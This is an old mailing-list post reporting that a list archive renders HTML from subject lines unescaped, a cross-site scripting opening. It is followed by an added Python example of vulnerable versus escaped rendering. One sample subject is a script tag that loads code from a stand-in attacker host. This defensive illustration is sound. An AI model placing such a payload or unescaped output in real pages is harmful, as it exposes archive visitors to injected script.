[Mailman-Users] Web-based list archive problem

Eric A. Meyer eric at meyerweb.com
Tue May 14 18:32:19 CEST 2002


Hi,

    A quick question that may be answered elsewhere, and if so I 
apologize. In the Web-based list archive, any HTML tags that are 
included in the "subject" line of a message get sent to the browser 
as HTML, and so start opening elements like <input>, <pre>, or 
inserting <hr>s.  It would be a very good idea to translate the HTML 
angle-bracket characters to &lt; &gt; (or the numeric equivalents) at 
a minimum; ampersands should probably get the same treatment.  As 
things are now, someone could post a message with a subject line 
containing a 'script' element that points to a security-exploiting 
piece of JS somewhere, thus making that month's archive into a Trojan 
horse.

--
Eric A. Meyer (eric at meyerweb.com) http://www.meyerweb.com/eric/
Author, "Cascading Style Sheets: The Definitive Guide" and
"CSS 2.0 Programmer's Reference"  http://www.meyerweb.com/eric/books/
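The fix the post asks for, as an added example rather than Mailman's own code: a hypothetical archive index row template, the vulnerable rendering that pastes the subject in raw, the same row with the subject escaped (both the named-entity form and the numeric-entity alternative mentioned above), and a small check that flags rows where the subject has injected markup or a bare ampersand. The sample subject lines, the `ROW_TEMPLATE` string and the `evil.js` URL are constructed for this illustration and are not taken from any real archive.

```python
import re
from html import escape

# Constructed sample subject lines, not taken from any real archive.
SAMPLE_SUBJECTS = [
    "Re: archive layout question",
    "<hr>ruler in the subject",
    "<pre>unclosed block",
    '<script src="http://attacker.example/evil.js"></script>',
    "A & B: bare ampersand",
]

# Hypothetical archive index row; the real Mailman template is not reproduced here.
ROW_TEMPLATE = '<li><a href="{href}">{subject}</a></li>'
TEMPLATE_TAGS = 4  # <li>, <a ...>, </a>, </li> supplied by the template itself


def render_row_vulnerable(subject, href="000001.html"):
    """The behaviour described in the post: the subject is pasted into the
    page unescaped, so any tag in it becomes live HTML for the browser."""
    return ROW_TEMPLATE.format(href=href, subject=subject)


def escape_named(subject):
    """Named entities: & -> &amp;  < -> &lt;  > -> &gt;  " -> &quot;  ' -> &#x27;.
    quote=True so the result is also safe inside a quoted attribute value."""
    return escape(subject, quote=True)


def escape_numeric(subject):
    """Numeric-entity variant, the alternative mentioned in the post.
    Ampersand is replaced first so the entities emitted afterwards are
    not themselves re-escaped."""
    table = [("&", "&#38;"), ("<", "&#60;"), (">", "&#62;"),
             ('"', "&#34;"), ("'", "&#39;")]
    for ch, ent in table:
        subject = subject.replace(ch, ent)
    return subject


def render_row_safe(subject, href="000001.html", escaper=escape_named):
    """Same template, subject escaped before substitution."""
    return ROW_TEMPLATE.format(href=href, subject=escaper(subject))


_TAG_RE = re.compile(r"<[^>]*>")
# An '&' not followed by a well-formed named or numeric entity reference.
_BARE_AMP_RE = re.compile(r"&(?!(?:[A-Za-z][A-Za-z0-9]*|#[0-9]+|#x[0-9A-Fa-f]+);)")


def injected_markup(rendered):
    """True if the rendered row carries tags beyond the four the template
    supplies, or a bare '&' the browser would try to parse as an entity."""
    return (len(_TAG_RE.findall(rendered)) != TEMPLATE_TAGS
            or bool(_BARE_AMP_RE.search(rendered)))


def audit(subjects=SAMPLE_SUBJECTS):
    """Count rows flagged by injected_markup() for both renderers; returns
    (flagged_vulnerable, flagged_escaped)."""
    vuln = sum(injected_markup(render_row_vulnerable(s)) for s in subjects)
    safe = sum(injected_markup(render_row_safe(s)) for s in subjects)
    return vuln, safe


if __name__ == "__main__":
    for s in SAMPLE_SUBJECTS:
        print("vulnerable:", render_row_vulnerable(s))
        print("escaped:   ", render_row_safe(s))
    print("rows flagged (vulnerable, escaped):", audit())
```

Escaping on output, at the point where the subject is written into the page, is the property that matters; escaping the stored header instead would corrupt it for the mbox and for mail clients. The `injected_markup` check is a coarse regression test for a template of known shape, not a general HTML sanitiser.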




